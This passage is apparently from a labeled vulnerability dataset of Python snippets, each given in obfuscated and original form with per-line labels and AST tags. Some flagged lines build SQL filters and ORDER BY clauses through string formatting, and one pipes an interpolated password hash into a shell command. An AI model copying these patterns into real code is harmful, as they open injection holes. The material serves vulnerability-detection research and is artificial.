"search_fields.extend(meta.get_search_fields())\n",
"for f in search_fields:\n",
"if filter_fields:\n",
"fmeta = meta.get_field(f.strip())\n",
"fields = list(set(fields + json.loads(filter_fields)))\n",
"formatted_fields = [('`tab%s`.`%s`' % (meta.name, f.strip())) for f in fields]\n",
"if f == 'name' or fmeta and fmeta.fieldtype in ['Data', 'Text',\n",
"formatted_fields.append(\n 'locate(\"{_txt}\", `tab{doctype}`.`name`) as `_relevance`'.format(_txt=\n frappe.db.escape((txt or '').replace('%', '')), doctype=frappe.db.\n escape(doctype)))\n",
"or_filters.append([doctype, f.strip(), 'like', '%{0}%'.format(txt)])\n",
"from frappe.model.db_query import get_order_by\n",
"order_by_based_on_meta = get_order_by(doctype, meta)\n",
"order_by = 'if(_relevance, _relevance, 99999), `tab{0}`.idx desc, {1}'.format(\n doctype, order_by_based_on_meta)\n",
"values = frappe.get_list(doctype, filters=filters, fields=formatted_fields,\n or_filters=or_filters, limit_start=start, limit_page_length=page_length,\n order_by=order_by, ignore_permissions=True if doctype == 'DocType' else\n False, as_list=not as_dict)\n",
"if as_dict:\n",
"for r in values:\n",
"frappe.response['values'] = [r[:-1] for r in values]\n",
"r.pop('_relevance')\n",
"frappe.response['values'] = values\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
4,
0,
0,
0,
4,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"ImportFrom'",
"Import'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"FunctionDef'",
"Assign'",
"FunctionDef'",
"Expr'",
"Condition",
"Condition",
"Condition",
"Expr'",
"Condition",
"Expr'",
"Expr'",
"For",
"Assign'",
"Expr'",
"For",
"Condition",
"Expr'",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Condition",
"FunctionDef'",
"Expr'",
"Condition",
"Assign'",
"Expr'",
"Condition",
"Assign'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"For",
"Condition",
"Assign'",
"Return'",
"Condition",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"Condition",
"Expr'",
"Condition",
"Expr'",
"Condition",
"Expr'",
"Assign'",
"Expr'",
"For",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"Expr'",
"Expr'",
"ImportFrom'",
"Assign'",
"Assign'",
"Assign'",
"Condition",
"For",
"Assign'",
"Expr'",
"Assign'"
] |
[
"def __init__(self, VAR_18, VAR_35=10000, **VAR_16):...\n",
"CLASS_17.__init__(self, VAR_18, VAR_35=length, **kw)\n"
] | [
"def __init__(self, item, length=10000, **kw):...\n",
"VLength.__init__(self, item, length=length, **kw)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Expr'"
] |
[
"def FUNC_17(self, VAR_9=True):...\n",
"\"\"\"docstring\"\"\"\n",
"self._kill_process_type(VAR_13.PROCESS_TYPE_PLASMA_STORE, VAR_9=check_alive)\n"
] | [
"def kill_plasma_store(self, check_alive=True):...\n",
"\"\"\"docstring\"\"\"\n",
"self._kill_process_type(ray_constants.PROCESS_TYPE_PLASMA_STORE,\n check_alive=check_alive)\n"
] | [
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Expr'"
] |
[
"import os\n",
"import sys\n",
"import unittest\n",
"from coalib.misc.Shell import escape_path_argument, prepare_string_argument, run_interactive_shell_command, run_shell_command\n",
"def FUNC_0(self):...\n",
"VAR_1 = 'sh'\n",
"self.assertEqual(escape_path_argument('/home/usr/a-file', VAR_1),\n '/home/usr/a-file')\n",
"self.assertEqual(escape_path_argument('/home/usr/a-dir/', VAR_1),\n '/home/usr/a-dir/')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-file with spaces.bla',\n VAR_1), '/home/us\\\\ r/a-file\\\\ with\\\\ spaces.bla')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-dir with spaces/x/',\n VAR_1), '/home/us\\\\ r/a-dir\\\\ with\\\\ spaces/x/')\n",
"self.assertEqual(escape_path_argument(\n 'relative something/with cherries and/pickles.delicious', VAR_1),\n 'relative\\\\ something/with\\\\ cherries\\\\ and/pickles.delicious')\n",
"def FUNC_1(self):...\n",
"VAR_1 = 'cmd'\n",
"self.assertEqual(escape_path_argument('C:\\\\Windows\\\\has-a-weird-shell.txt',\n VAR_1), '\"C:\\\\Windows\\\\has-a-weird-shell.txt\"')\n",
"self.assertEqual(escape_path_argument('C:\\\\Windows\\\\lolrofl\\\\dirs\\\\', VAR_1\n ), '\"C:\\\\Windows\\\\lolrofl\\\\dirs\\\\\"')\n",
"self.assertEqual(escape_path_argument('X:\\\\Users\\\\Maito Gai\\\\fi le.exe',\n VAR_1), '\"X:\\\\Users\\\\Maito Gai\\\\fi le.exe\"')\n",
"self.assertEqual(escape_path_argument('X:\\\\Users\\\\Mai to Gai\\\\director y\\\\',\n VAR_1), '\"X:\\\\Users\\\\Mai to Gai\\\\director y\\\\\"')\n",
"self.assertEqual(escape_path_argument(\n 'X:\\\\Users\\\\Maito Gai\\\\\"seven-gates\".y', VAR_1),\n '\"X:\\\\Users\\\\Maito Gai\\\\^\"seven-gates^\".y\"')\n",
"self.assertEqual(escape_path_argument('System32\\\\my-custom relative tool\\\\',\n VAR_1), '\"System32\\\\my-custom relative tool\\\\\"')\n",
"self.assertEqual(escape_path_argument('System32\\\\illegal\" name \"\".curd',\n VAR_1), '\"System32\\\\illegal^\" name ^\"^\".curd\"')\n",
"def FUNC_2(self):...\n",
"VAR_1 = 'INVALID'\n",
"self.assertEqual(escape_path_argument('/home/usr/a-file', VAR_1),\n '/home/usr/a-file')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-file with spaces.bla',\n VAR_1), '/home/us r/a-file with spaces.bla')\n",
"self.assertEqual(escape_path_argument('|home|us r|a*dir with spaces|x|',\n VAR_1), '|home|us r|a*dir with spaces|x|')\n",
"self.assertEqual(escape_path_argument('system|a|b|c?d', VAR_1),\n 'system|a|b|c?d')\n",
"@staticmethod...\n",
"return ' '.join(escape_path_argument(s) for s in (sys.executable, os.path.\n join(os.path.dirname(os.path.realpath(__file__)),\n 'run_shell_command_testfiles', VAR_0)))\n"
] | [
"import os\n",
"import sys\n",
"import unittest\n",
"from coalib.misc.Shell import escape_path_argument, prepare_string_argument, run_interactive_shell_command, run_shell_command\n",
"def test_escape_path_argument_sh(self):...\n",
"_type = 'sh'\n",
"self.assertEqual(escape_path_argument('/home/usr/a-file', _type),\n '/home/usr/a-file')\n",
"self.assertEqual(escape_path_argument('/home/usr/a-dir/', _type),\n '/home/usr/a-dir/')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-file with spaces.bla',\n _type), '/home/us\\\\ r/a-file\\\\ with\\\\ spaces.bla')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-dir with spaces/x/',\n _type), '/home/us\\\\ r/a-dir\\\\ with\\\\ spaces/x/')\n",
"self.assertEqual(escape_path_argument(\n 'relative something/with cherries and/pickles.delicious', _type),\n 'relative\\\\ something/with\\\\ cherries\\\\ and/pickles.delicious')\n",
"def test_escape_path_argument_cmd(self):...\n",
"_type = 'cmd'\n",
"self.assertEqual(escape_path_argument('C:\\\\Windows\\\\has-a-weird-shell.txt',\n _type), '\"C:\\\\Windows\\\\has-a-weird-shell.txt\"')\n",
"self.assertEqual(escape_path_argument('C:\\\\Windows\\\\lolrofl\\\\dirs\\\\', _type\n ), '\"C:\\\\Windows\\\\lolrofl\\\\dirs\\\\\"')\n",
"self.assertEqual(escape_path_argument('X:\\\\Users\\\\Maito Gai\\\\fi le.exe',\n _type), '\"X:\\\\Users\\\\Maito Gai\\\\fi le.exe\"')\n",
"self.assertEqual(escape_path_argument('X:\\\\Users\\\\Mai to Gai\\\\director y\\\\',\n _type), '\"X:\\\\Users\\\\Mai to Gai\\\\director y\\\\\"')\n",
"self.assertEqual(escape_path_argument(\n 'X:\\\\Users\\\\Maito Gai\\\\\"seven-gates\".y', _type),\n '\"X:\\\\Users\\\\Maito Gai\\\\^\"seven-gates^\".y\"')\n",
"self.assertEqual(escape_path_argument('System32\\\\my-custom relative tool\\\\',\n _type), '\"System32\\\\my-custom relative tool\\\\\"')\n",
"self.assertEqual(escape_path_argument('System32\\\\illegal\" name \"\".curd',\n _type), '\"System32\\\\illegal^\" name ^\"^\".curd\"')\n",
"def test_escape_path_argument_unsupported(self):...\n",
"_type = 'INVALID'\n",
"self.assertEqual(escape_path_argument('/home/usr/a-file', _type),\n '/home/usr/a-file')\n",
"self.assertEqual(escape_path_argument('/home/us r/a-file with spaces.bla',\n _type), '/home/us r/a-file with spaces.bla')\n",
"self.assertEqual(escape_path_argument('|home|us r|a*dir with spaces|x|',\n _type), '|home|us r|a*dir with spaces|x|')\n",
"self.assertEqual(escape_path_argument('system|a|b|c?d', _type),\n 'system|a|b|c?d')\n",
"@staticmethod...\n",
"return ' '.join(escape_path_argument(s) for s in (sys.executable, os.path.\n join(os.path.dirname(os.path.realpath(__file__)),\n 'run_shell_command_testfiles', scriptname)))\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
2
] | [
"Import'",
"Import'",
"Import'",
"ImportFrom'",
"FunctionDef'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"FunctionDef'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"FunctionDef'",
"Assign'",
"Expr'",
"Expr'",
"Expr'",
"Expr'",
"Condition",
"Return'"
] |
[
"@view_config(route_name='note', permission='edit', request_method='GET',...\n",
"return dict(title='Redigera anteckning', VAR_2=context.note)\n"
] | [
"@view_config(route_name='note', permission='edit', request_method='GET',...\n",
"return dict(title='Redigera anteckning', note=context.note)\n"
] | [
0,
0
] | [
"Condition",
"Return'"
] |
[
"def FUNC_6(self, VAR_10, VAR_11):...\n",
"\"\"\"docstring\"\"\"\n"
] | [
"def create_volume_from_snapshot(self, volume, snapshot):...\n",
"\"\"\"docstring\"\"\"\n"
] | [
0,
0
] | [
"FunctionDef'",
"Docstring"
] |
[
"def FUNC_4(self, VAR_1, VAR_3, VAR_4=6, VAR_5=10):...\n",
"if self.is_sys_user(VAR_1):\n",
"VAR_19 = textutil.gen_password_hash(VAR_3, VAR_4, VAR_5)\n",
"VAR_20 = \"echo '{0}'|pw usermod {1} -H 0 \".format(VAR_19, VAR_1)\n",
"VAR_21, VAR_22 = shellutil.run_get_output(VAR_20, log_cmd=False)\n",
"if VAR_21 != 0:\n"
] | [
"def chpasswd(self, username, password, crypt_id=6, salt_len=10):...\n",
"if self.is_sys_user(username):\n",
"passwd_hash = textutil.gen_password_hash(password, crypt_id, salt_len)\n",
"cmd = \"echo '{0}'|pw usermod {1} -H 0 \".format(passwd_hash, username)\n",
"ret, output = shellutil.run_get_output(cmd, log_cmd=False)\n",
"if ret != 0:\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Condition"
] |
[
"def FUNC_12(VAR_1, VAR_2):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_11 = db.connection.cursor(db.pymysql.cursors.DictCursor)\n",
"VAR_11.execute('string', (VAR_1, VAR_2))\n",
"VAR_14 = VAR_11.fetchone()\n",
"VAR_15 = VAR_14['state'] if VAR_14 else 'REVEALED'\n",
"VAR_11.execute('string', {'player_id': VAR_2, 'achievement_id': VAR_1,\n 'state': VAR_15})\n",
"return dict(current_state=new_state)\n"
] | [
"def reveal_achievement(achievement_id, player_id):...\n",
"\"\"\"docstring\"\"\"\n",
"cursor = db.connection.cursor(db.pymysql.cursors.DictCursor)\n",
"cursor.execute(\n \"\"\"SELECT\n state\n FROM player_achievements\n WHERE achievement_id = %s AND player_id = %s\"\"\"\n , (achievement_id, player_id))\n",
"player_achievement = cursor.fetchone()\n",
"new_state = player_achievement['state'] if player_achievement else 'REVEALED'\n",
"cursor.execute(\n \"\"\"INSERT INTO player_achievements (player_id, achievement_id, state)\n VALUES\n (%(player_id)s, %(achievement_id)s, %(state)s)\n ON DUPLICATE KEY UPDATE\n state = VALUES(state)\"\"\"\n , {'player_id': player_id, 'achievement_id': achievement_id, 'state':\n new_state})\n",
"return dict(current_state=new_state)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Expr'",
"Return'"
] |
[
"def FUNC_4(VAR_11, VAR_12=False):...\n",
"\"\"\"docstring\"\"\"\n",
"if VAR_1['VERBOSITY'] >= 1:\n",
"VAR_0.info('$ ' + ' '.join(VAR_11))\n",
"VAR_19 = dict()\n",
"if VAR_1['VERBOSITY'] >= 3:\n",
"VAR_19['stdout'] = io.open(os.devnull, 'wb')\n",
"VAR_32 = subprocess.call(VAR_11, **kwargs)\n",
"VAR_19['stderr'] = subprocess.STDOUT\n",
"if not VAR_12 and VAR_32 != 0:\n"
] | [
"def sh(cmdline, ignore_failure=False):...\n",
"\"\"\"docstring\"\"\"\n",
"if CONFIG['VERBOSITY'] >= 1:\n",
"logger.info('$ ' + ' '.join(cmdline))\n",
"kwargs = dict()\n",
"if CONFIG['VERBOSITY'] >= 3:\n",
"kwargs['stdout'] = io.open(os.devnull, 'wb')\n",
"ret = subprocess.call(cmdline, **kwargs)\n",
"kwargs['stderr'] = subprocess.STDOUT\n",
"if not ignore_failure and ret != 0:\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Condition",
"Expr'",
"Assign'",
"Condition",
"Assign'",
"Assign'",
"Assign'",
"Condition"
] |
[
"\"\"\"string\"\"\"\n",
"import sys\n",
"import citest.aws_testing as aws\n",
"import citest.json_contract as jc\n",
"import citest.service_testing as st\n",
"import spinnaker_testing as sk\n",
"import spinnaker_testing.gate as gate\n",
"\"\"\"string\"\"\"\n",
"@classmethod...\n",
"\"\"\"docstring\"\"\"\n",
"return gate.new_agent(VAR_1)\n"
] | [
"\"\"\"\nSmoke test to see if Spinnaker can interoperate with Amazon Web Services.\n\nSee testable_service/integration_test.py and spinnaker_testing/spinnaker.py\nfor more details.\n\nThe smoke test will use ssh to peek at the spinnaker configuration\nto determine the managed project it should verify, and to determine\nthe spinnaker account name to use when sending it commands.\n\nSample Usage:\n Assuming you have created $PASSPHRASE_FILE (which you should chmod 400)\n and $CITEST_ROOT points to the root directory of this repository\n (which is . if you execute this from the root)\n\n PYTHONPATH=$CITEST_ROOT:$CITEST_ROOT/spinnaker python $CITEST_ROOT/spinnaker/spinnaker_system/smoke_test.py --gce_ssh_passphrase_file=$PASSPHRASE_FILE --gce_project=$PROJECT --gce_zone=$ZONE --gce_instance=$INSTANCE\n --test_aws_zone=$AWS_ZONE --aws_profile=$AWS_PROFILE\nor\n PYTHONPATH=$CITEST_ROOT:$CITEST_ROOT/spinnaker python $CITEST_ROOT/spinnaker/spinnaker_system/smoke_test.py --native_hostname=host-running-smoke-test\n --test_aws_zone=$AWS_ZONE --aws_profile=$AWS_PROFILE\n\n Note that the $AWS_ZONE is not directly used, rather it is a standard\n parameter being used to infer the region. The test is going to pick\n some different availability zones within the region in order to test kato.\n These are currently hardcoded in.\n\"\"\"\n",
"import sys\n",
"import citest.aws_testing as aws\n",
"import citest.json_contract as jc\n",
"import citest.service_testing as st\n",
"import spinnaker_testing as sk\n",
"import spinnaker_testing.gate as gate\n",
"\"\"\"Defines the scenario for the smoke test.\n\n This scenario defines the different test operations.\n We're going to:\n Create a Spinnaker Application\n Create a Load Balancer\n Create a Server Group\n Delete each of the above (in reverse order)\n \"\"\"\n",
"@classmethod...\n",
"\"\"\"docstring\"\"\"\n",
"return gate.new_agent(bindings)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Expr'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Expr'",
"Condition",
"Docstring",
"Return'"
] |
[
"def FUNC_8(self):...\n",
"\"\"\"docstring\"\"\"\n",
"VAR_6 = self\n",
"VAR_12 = []\n",
"def FUNC_29(VAR_13):...\n",
"def FUNC_30(VAR_13):...\n",
"self.fail('authenticate should not be called')\n",
"@classmethod...\n",
"return [FUNC_29, FUNC_30]\n"
] | [
"def test_authentication_error(self):...\n",
"\"\"\"docstring\"\"\"\n",
"test = self\n",
"calls = []\n",
"def failing(request):...\n",
"def skipped(request):...\n",
"self.fail('authenticate should not be called')\n",
"@classmethod...\n",
"return [failing, skipped]\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"Docstring",
"Assign'",
"Assign'",
"FunctionDef'",
"FunctionDef'",
"Expr'",
"Condition",
"Return'"
] |
[
"from base import Field\n",
"VAR_0 = 255\n",
"VAR_1 = 'CHAR'\n",
"def __init__(self, VAR_2=VAR_0, *VAR_3, **VAR_4):...\n",
"super(CLASS_0, self).__init__(*VAR_3, **kwargs)\n",
"self.max_length = VAR_2\n",
"def FUNC_0(self):...\n",
"if self.model_class._meta.database:\n",
"return '{0}({1})'.format(self.model_class._meta.database.TYPES[self.TYPE],\n self.max_length)\n",
"return self.TYPE\n"
] | [
"from base import Field\n",
"MAX_LENGTH = 255\n",
"TYPE = 'CHAR'\n",
"def __init__(self, max_length=MAX_LENGTH, *args, **kwargs):...\n",
"super(CharField, self).__init__(*args, **kwargs)\n",
"self.max_length = max_length\n",
"def get_db_field(self):...\n",
"if self.model_class._meta.database:\n",
"return '{0}({1})'.format(self.model_class._meta.database.TYPES[self.TYPE],\n self.max_length)\n",
"return self.TYPE\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"ImportFrom'",
"Assign'",
"Assign'",
"FunctionDef'",
"Expr'",
"Assign'",
"FunctionDef'",
"Condition",
"Return'",
"Return'"
] |
[
"def FUNC_1(VAR_0, VAR_1):...\n",
"return os.utime(VAR_0, VAR_1, follow_symlinks=os.utime not in os.\n supports_follow_symlinks)\n"
] | [
"def lutime(f, times):...\n",
"return os.utime(f, times, follow_symlinks=os.utime not in os.\n supports_follow_symlinks)\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"\"\"\"string\"\"\"\n",
"import argparse\n",
"import time\n",
"import csv\n",
"import logging\n",
"import sys\n",
"import shutil\n",
"from benchmark import config, data_service\n",
"def FUNC_0():...\n",
"\"\"\"docstring\"\"\"\n",
"logging.debug('Getting cli arguments')\n",
"VAR_0 = argparse.ArgumentParser(description=\n 'A benchmark for genomics routines in Python.')\n",
"VAR_1 = VAR_0.add_subparsers(title='commands', dest='command')\n",
"VAR_1.required = True\n",
"VAR_2 = VAR_1.add_parser('config', help=\n 'Setting up the default configuration of the benchmark. It creates the default configuration file.'\n )\n",
"VAR_2.add_argument('--output_config', type=str, required=True, help=\n 'Specify the output path to a configuration file.', metavar='FILEPATH')\n",
"VAR_2.add_argument('-f', action='store_true', help=\n 'Overwrite the destination file if it already exists.')\n",
"VAR_3 = VAR_1.add_parser('setup', help=\n 'Preparation and setting up of the data for the benchmark. It requires a configuration file.'\n )\n",
"VAR_3.add_argument('--config_file', required=True, help=\n 'Location of the configuration file', metavar='FILEPATH')\n",
"VAR_4 = VAR_1.add_parser('exec', help=\n 'Execution of the benchmark modes. It requires a configuration file.')\n",
"VAR_4.add_argument('--label', type=str, default='run', metavar='RUN_LABEL',\n help='Label for the benchmark run.')\n",
"VAR_4.add_argument('--config_file', type=str, required=True, help=\n 'Specify the path to a configuration file.', metavar='FILEPATH')\n",
"VAR_5 = vars(VAR_0.parse_args())\n",
"return VAR_5\n"
] | [
"\"\"\" Main module for the benchmark. It reads the command line arguments, reads the benchmark configuration, \ndetermines the runtime mode (dynamic vs. static); if dynamic, gets the benchmark data from the server,\nruns the benchmarks, and records the timer results. \"\"\"\n",
"import argparse\n",
"import time\n",
"import csv\n",
"import logging\n",
"import sys\n",
"import shutil\n",
"from benchmark import config, data_service\n",
"def get_cli_arguments():...\n",
"\"\"\"docstring\"\"\"\n",
"logging.debug('Getting cli arguments')\n",
"parser = argparse.ArgumentParser(description=\n 'A benchmark for genomics routines in Python.')\n",
"subparser = parser.add_subparsers(title='commands', dest='command')\n",
"subparser.required = True\n",
"config_parser = subparser.add_parser('config', help=\n 'Setting up the default configuration of the benchmark. It creates the default configuration file.'\n )\n",
"config_parser.add_argument('--output_config', type=str, required=True, help\n ='Specify the output path to a configuration file.', metavar='FILEPATH')\n",
"config_parser.add_argument('-f', action='store_true', help=\n 'Overwrite the destination file if it already exists.')\n",
"data_setup_parser = subparser.add_parser('setup', help=\n 'Preparation and setting up of the data for the benchmark. It requires a configuration file.'\n )\n",
"data_setup_parser.add_argument('--config_file', required=True, help=\n 'Location of the configuration file', metavar='FILEPATH')\n",
"benchmark_exec_parser = subparser.add_parser('exec', help=\n 'Execution of the benchmark modes. It requires a configuration file.')\n",
"benchmark_exec_parser.add_argument('--label', type=str, default='run',\n metavar='RUN_LABEL', help='Label for the benchmark run.')\n",
"benchmark_exec_parser.add_argument('--config_file', type=str, required=True,\n help='Specify the path to a configuration file.', metavar='FILEPATH')\n",
"runtime_configuration = vars(parser.parse_args())\n",
"return runtime_configuration\n"
] | [
0,
0,
0,
0,
0,
0,
0,
7,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
7,
0,
0,
0
] | [
"Expr'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"Import'",
"ImportFrom'",
"FunctionDef'",
"Docstring",
"Expr'",
"Assign'",
"Assign'",
"Assign'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Expr'",
"Assign'",
"Expr'",
"Expr'",
"Assign'",
"Return'"
] |
[
"@staticmethod...\n",
"\"\"\"docstring\"\"\"\n",
"if isinstance(VAR_17, list):\n",
"return ','.join([(str(x) if x is not None else '') for x in VAR_17])\n",
"return str(VAR_17)\n"
] | [
"@staticmethod...\n",
"\"\"\"docstring\"\"\"\n",
"if isinstance(value, list):\n",
"return ','.join([(str(x) if x is not None else '') for x in value])\n",
"return str(value)\n"
] | [
0,
0,
0,
0,
0
] | [
"Condition",
"Docstring",
"Condition",
"Return'",
"Return'"
] |
[
"@defer.inlineCallbacks...\n",
"VAR_61 = self._accounts[VAR_16.user_auth.username]\n",
"self._services_by_user[VAR_16.user_auth.uuid] = VAR_61.services\n",
"yield defer.succeed(None)\n"
] | [
"@defer.inlineCallbacks...\n",
"account = self._accounts[leap_session.user_auth.username]\n",
"self._services_by_user[leap_session.user_auth.uuid] = account.services\n",
"yield defer.succeed(None)\n"
] | [
0,
0,
0,
0
] | [
"Condition",
"Assign'",
"Assign'",
"Expr'"
] |
[
"@api.multi...\n",
"\"\"\"docstring\"\"\"\n",
"self.filtered(lambda p: not p.partner_latitude or not p.partner_longitude\n ).geo_localize()\n",
"for VAR_54 in self.filtered(lambda p: p.partner_latitude and p.\n",
"VAR_26 = GeoPoint.from_latlon(self.env.cr, VAR_54.partner_latitude, VAR_54.\n partner_longitude)\n",
"return True\n",
"VAR_32 = {'geo_point': VAR_26.wkt}\n",
"VAR_54.write(VAR_32)\n",
"VAR_54.advocate_details_id.write(VAR_32)\n"
] | [
"@api.multi...\n",
"\"\"\"docstring\"\"\"\n",
"self.filtered(lambda p: not p.partner_latitude or not p.partner_longitude\n ).geo_localize()\n",
"for partner in self.filtered(lambda p: p.partner_latitude and p.\n",
"geo_point = GeoPoint.from_latlon(self.env.cr, partner.partner_latitude,\n partner.partner_longitude)\n",
"return True\n",
"vals = {'geo_point': geo_point.wkt}\n",
"partner.write(vals)\n",
"partner.advocate_details_id.write(vals)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0
] | [
"Condition",
"Docstring",
"Expr'",
"For",
"Assign'",
"Return'",
"Assign'",
"Expr'",
"Expr'"
] |
[
"def FUNC_16(self, VAR_21):...\n",
"for i, VAR_18 in enumerate(list(self._handlers)):\n",
"VAR_40, VAR_41, VAR_41 = VAR_18\n",
"self._received.append(VAR_21)\n",
"VAR_42 = VAR_40(VAR_21)\n",
"VAR_21, VAR_42 = VAR_42\n",
"if VAR_42:\n",
"self._handlers.remove(VAR_18)\n"
] | [
"def _receive_message(self, msg):...\n",
"for i, handler in enumerate(list(self._handlers)):\n",
"handle_message, _, _ = handler\n",
"self._received.append(msg)\n",
"handled = handle_message(msg)\n",
"msg, handled = handled\n",
"if handled:\n",
"self._handlers.remove(handler)\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"For",
"Assign'",
"Expr'",
"Assign'",
"Assign'",
"Condition",
"Expr'"
] |
[
"import logging\n",
"from google.appengine.api import users\n",
"from google.appengine.ext import ndb\n",
"from gae_libs.handlers.base_handler import BaseHandler\n",
"from gae_libs.handlers.base_handler import Permission\n",
"from gae_libs.http import auth_util\n",
"from libs import analysis_status\n",
"from libs import time_util\n",
"from model import triage_status\n",
"from model.flake.flake_analysis_request import FlakeAnalysisRequest\n",
"from model.flake.flake_try_job import FlakeTryJob\n",
"from model.flake.flake_try_job_data import FlakeTryJobData\n",
"from model.flake.master_flake_analysis import MasterFlakeAnalysis\n",
"from waterfall import buildbot\n",
"from waterfall.flake import flake_analysis_service\n",
"from waterfall.flake import triggering_sources\n",
"from waterfall.trigger_base_swarming_task_pipeline import NO_TASK\n",
"from waterfall.trigger_base_swarming_task_pipeline import NO_TASK_EXCEPTION\n",
"def FUNC_0(VAR_0):...\n",
"\"\"\"docstring\"\"\"\n",
"if VAR_0.suspected_flake_build_number is None:\n",
"return {}\n",
"VAR_2 = VAR_0.GetDataPointOfSuspectedBuild()\n",
"assert VAR_2\n",
"return {'confidence': VAR_0.confidence_in_suspected_build, 'build_number':\n VAR_0.suspected_flake_build_number, 'commit_position': VAR_2.\n commit_position, 'git_hash': VAR_2.git_hash,\n 'lower_bound_commit_position': VAR_2.previous_build_commit_position,\n 'lower_bound_git_hash': VAR_2.previous_build_git_hash, 'triage_result':\n VAR_0.triage_history[-1].triage_result if VAR_0.triage_history else\n triage_status.UNTRIAGED}\n"
] | [
"import logging\n",
"from google.appengine.api import users\n",
"from google.appengine.ext import ndb\n",
"from gae_libs.handlers.base_handler import BaseHandler\n",
"from gae_libs.handlers.base_handler import Permission\n",
"from gae_libs.http import auth_util\n",
"from libs import analysis_status\n",
"from libs import time_util\n",
"from model import triage_status\n",
"from model.flake.flake_analysis_request import FlakeAnalysisRequest\n",
"from model.flake.flake_try_job import FlakeTryJob\n",
"from model.flake.flake_try_job_data import FlakeTryJobData\n",
"from model.flake.master_flake_analysis import MasterFlakeAnalysis\n",
"from waterfall import buildbot\n",
"from waterfall.flake import flake_analysis_service\n",
"from waterfall.flake import triggering_sources\n",
"from waterfall.trigger_base_swarming_task_pipeline import NO_TASK\n",
"from waterfall.trigger_base_swarming_task_pipeline import NO_TASK_EXCEPTION\n",
"def _GetSuspectedFlakeInfo(analysis):...\n",
"\"\"\"docstring\"\"\"\n",
"if analysis.suspected_flake_build_number is None:\n",
"return {}\n",
"data_point = analysis.GetDataPointOfSuspectedBuild()\n",
"assert data_point\n",
"return {'confidence': analysis.confidence_in_suspected_build,\n 'build_number': analysis.suspected_flake_build_number,\n 'commit_position': data_point.commit_position, 'git_hash': data_point.\n git_hash, 'lower_bound_commit_position': data_point.\n previous_build_commit_position, 'lower_bound_git_hash': data_point.\n previous_build_git_hash, 'triage_result': analysis.triage_history[-1].\n triage_result if analysis.triage_history else triage_status.UNTRIAGED}\n"
] | [
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
5,
0,
0,
0,
0
] | [
"Import'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"ImportFrom'",
"FunctionDef'",
"Docstring",
"Condition",
"Return'",
"Assign'",
"Assert'",
"Return'"
] |
[
"def __getstate__(self):...\n",
"return self.serialize()\n"
] | [
"def __getstate__(self):...\n",
"return self.serialize()\n"
] | [
0,
0
] | [
"FunctionDef'",
"Return'"
] |
[
"def FUNC_1(self):...\n",
"for VAR_7 in self.targets:\n",
"self.schedule(self.add_comment, (VAR_7, self.msgfun()))\n",
"if len(self.targets) == 0:\n",
"self.schedule(self.scan_targets_loop)\n",
"self.schedule(self.comment_loop)\n"
] | [
"def comment_loop(self):...\n",
"for t in self.targets:\n",
"self.schedule(self.add_comment, (t, self.msgfun()))\n",
"if len(self.targets) == 0:\n",
"self.schedule(self.scan_targets_loop)\n",
"self.schedule(self.comment_loop)\n"
] | [
0,
0,
0,
0,
0,
0
] | [
"FunctionDef'",
"For",
"Expr'",
"Condition",
"Expr'",
"Expr'"
] |
[
"def FUNC_2(VAR_6, VAR_8=1):...\n",
"VAR_35 = dateutil_parse(VAR_6, ignoretz=True).replace(microsecond=0)\n",
"return VAR_35 - timedelta(seconds=(dt - dt.min).seconds % alignment)\n"
] | [
"def parse_datetime(value, alignment=1):...\n",
